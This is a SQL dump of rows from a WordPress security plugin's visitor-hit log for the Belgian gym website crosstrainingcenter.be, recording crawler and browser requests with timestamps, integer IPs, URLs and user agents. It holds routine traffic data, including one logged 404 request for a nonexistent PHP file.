(69920, 1492569740.544716, 2996488207, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)'),
(69921, 1492570885.357905, 676177756, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances/feed/', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(69922, 1492576880.187606, 3639886562, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)'),
(69923, 1492577717.014871, 3639886562, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/266-2/', '', 'Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)'),
(69924, 1492577886.552213, 1123632454, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(69925, 1492579941.885765, 1489376164, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; MJ12bot/v1.4.7; http://mj12bot.com/)'),
(69926, 1492579944.311311, 1489376164, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances/', '', 'Mozilla/5.0 (compatible; MJ12bot/v1.4.7; http://mj12bot.com/)'),
(69927, 1492581321.067083, 1374841142, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/603.1.30 (KHTML, like Gecko)'),
(69928, 1492581321.952505, 1374841142, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(69929, 1492581322.711327, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(69930, 1492581323.189675, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(69931, 1492581323.669148, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(69932, 1492581324.066602, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(69933, 1492581324.741391, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(69934, 1492581325.824193, 1374841142, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_0 like Mac OS X) AppleWebKit/602.1.38 (KHTML, like Gecko) Version/10.0 Mobile/14A300 Safari/602.1'),
(69935, 1492581326.643026, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(69936, 1492581327.476415, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(69937, 1492581327.913925, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(69938, 1492581328.414046, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(69939, 1492581328.898953, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(69940, 1492581329.317465, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(69941, 1492581778.894395, 1123632454, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(69942, 1492584051.428583, 1054014312, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/contact/', '', 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0'),
(69943, 1492585694.071219, 2637637607, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(69944, 1492585715.661876, 2637637607, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/en-images/feed/', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(69945, 1492591092.538061, 1374841142, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/603.1.30 (KHTML, like Gecko)'),
(69946, 1492591093.027277, 1374841142, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(69947, 1492591093.504339, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(69948, 1492591093.918590, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(69949, 1492591094.395708, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(69950, 1492591094.787323, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(69951, 1492591095.199685, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(69952, 1492591095.635423, 1374841142, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_0 like Mac OS X) AppleWebKit/602.1.38 (KHTML, like Gecko) Version/10.0 Mobile/14A300 Safari/602.1'),
(69953, 1492591096.084574, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(69954, 1492591096.490452, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(69955, 1492591096.887057, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(69956, 1492591097.381476, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(69957, 1492591097.836161, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(69958, 1492591098.271068, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(69959, 1492593815.999863, 2513051914, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-temporary.php', 'crosstrainingcenter.be', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.75 Safari/537.36'),
(69960, 1492596508.538603, 1586277993, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'https://www.google.be/', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36'),
(69961, 1492596510.087494, 1586277993, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36'),
(69962, 1492596515.438887, 1586277993, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36'),
(69963, 1492596535.288429, 1586277993, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/notre-philosophie/', 'http://www.crosstrainingcenter.be/les-seances-namur/', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36'),
(69964, 1492596536.257962, 1586277993, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/lequipe/', 'http://www.crosstrainingcenter.be/notre-philosophie/', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36'),
(69965, 1492596542.555394, 1586277993, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/en-images/', 'http://www.crosstrainingcenter.be/lequipe/', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36'),
(69966, 1492596543.751922, 1586277993, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/contact/', 'http://www.crosstrainingcenter.be/en-images/', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36'),
(69967, 1492596554.881379, 1586277993, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/', 'http://www.crosstrainingcenter.be/contact/', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36'),
(69968, 1492596560.550435, 1586277993, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/notre-philosophie/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36'),
(69969, 1492596562.144500, 1586277993, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'http://www.crosstrainingcenter.be/notre-philosophie/', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36'),
(69970, 1492597775.745412, 872366352, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/266-2/', '', 'Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/)'),
(69971, 1492597796.065351, 96753435, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/)'),
(69972, 1492605308.046299, 1123632454, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; Google Web Preview Analytics) Chrome/27.0.1453 Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(69973, 1492606567.015246, 1837165719, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1'),
(69974, 1492606567.645018, 1837165719, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(69975, 1492606568.187232, 1837165719, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(69976, 1492606568.661036, 1837165719, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(69977, 1492606569.390780, 1837165719, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(69978, 1492606569.920954, 1837165719, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(69979, 1492606570.547463, 1837165719, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(69980, 1492606571.041485, 1837165719, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(69981, 1492606571.781365, 1837165719, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(69982, 1492606572.538879, 1837165719, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(69983, 1492606572.985673, 1837165719, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(69984, 1492606834.835880, 1374841142, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/603.1.30 (KHTML, like Gecko)'),
(69985, 1492606835.334750, 1374841142, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(69986, 1492606835.736615, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(69987, 1492606836.157707, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(69988, 1492606836.662785, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(69989, 1492606837.063816, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(69990, 1492606837.532909, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(69991, 1492606837.996308, 1374841142, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_0 like Mac OS X) AppleWebKit/602.1.38 (KHTML, like Gecko) Version/10.0 Mobile/14A300 Safari/602.1'),
(69992, 1492606838.240776, 1374841142, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/603.1.30 (KHTML, like Gecko)'),
(69993, 1492606838.686679, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(69994, 1492606839.181909, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(69995, 1492606839.596219, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(69996, 1492606840.085442, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(69997, 1492606840.585824, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(69998, 1492606840.992049, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(69999, 1492606841.444787, 1374841142, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_0 like Mac OS X) AppleWebKit/602.1.38 (KHTML, like Gecko) Version/10.0 Mobile/14A300 Safari/602.1'),
(70000, 1492606841.932496, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(70001, 1492606842.432619, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(70002, 1492606842.843513, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(70003, 1492606843.315121, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(70004, 1492606843.767568, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(70005, 1492606844.172197, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(70006, 1492610684.605833, 1374841142, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/603.1.30 (KHTML, like Gecko)'),
(70007, 1492610685.279577, 1374841142, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(70008, 1492610685.766047, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(70009, 1492610686.352187, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(70010, 1492610688.515897, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(70011, 1492610689.704492, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(70012, 1492610690.305971, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(70013, 1492610691.264650, 1374841142, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_0 like Mac OS X) AppleWebKit/602.1.38 (KHTML, like Gecko) Version/10.0 Mobile/14A300 Safari/602.1'),
(70014, 1492610692.101246, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(70015, 1492610692.494956, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(70016, 1492610692.938553, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(70017, 1492610693.427682, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(70018, 1492610693.832900, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(70019, 1492610694.271462, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(70020, 1492612063.309817, 1123632467, 0, 0, 1, 0, 1, 'https://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(70021, 1492612064.267069, 1123631313, 0, 1, 1, 0, 1, 'https://www.crosstrainingcenter.be/.well-known/apple-app-site-association', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(70022, 1492614095.888548, 876230790, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Cliqzbot/1.0; +http://cliqz.com/company/cliqzbot)'),
(70023, 1492614099.352699, 876230790, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/le-cross-training/', '', 'Mozilla/5.0 (compatible; Cliqzbot/1.0; +http://cliqz.com/company/cliqzbot)');
INSERT INTO `www2_wfHits` (`id`, `ctime`, `IP`, `jsRun`, `is404`, `isGoogle`, `userID`, `newVisit`, `URL`, `referer`, `UA`) VALUES
(70024, 1492620372.756452, 1374841142, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/603.1.30 (KHTML, like Gecko)'),
(70025, 1492620373.251024, 1374841142, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(70026, 1492620373.683350, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(70027, 1492620374.264068, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(70028, 1492620374.812452, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(70029, 1492620375.208788, 1374841142, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/603.1.30 (KHTML, like Gecko)'),
(70030, 1492620375.645059, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(70031, 1492620375.832327, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(70032, 1492620376.340145, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(70033, 1492620376.793719, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(70034, 1492620377.278237, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(70035, 1492620377.786547, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(70036, 1492620378.188388, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(70037, 1492620378.623244, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(70038, 1492620378.908812, 1374841142, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/603.1.30 (KHTML, like Gecko)'),
(70039, 1492620378.997407, 1374841142, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/603.1.30 (KHTML, like Gecko)'),
(70040, 1492620379.414779, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
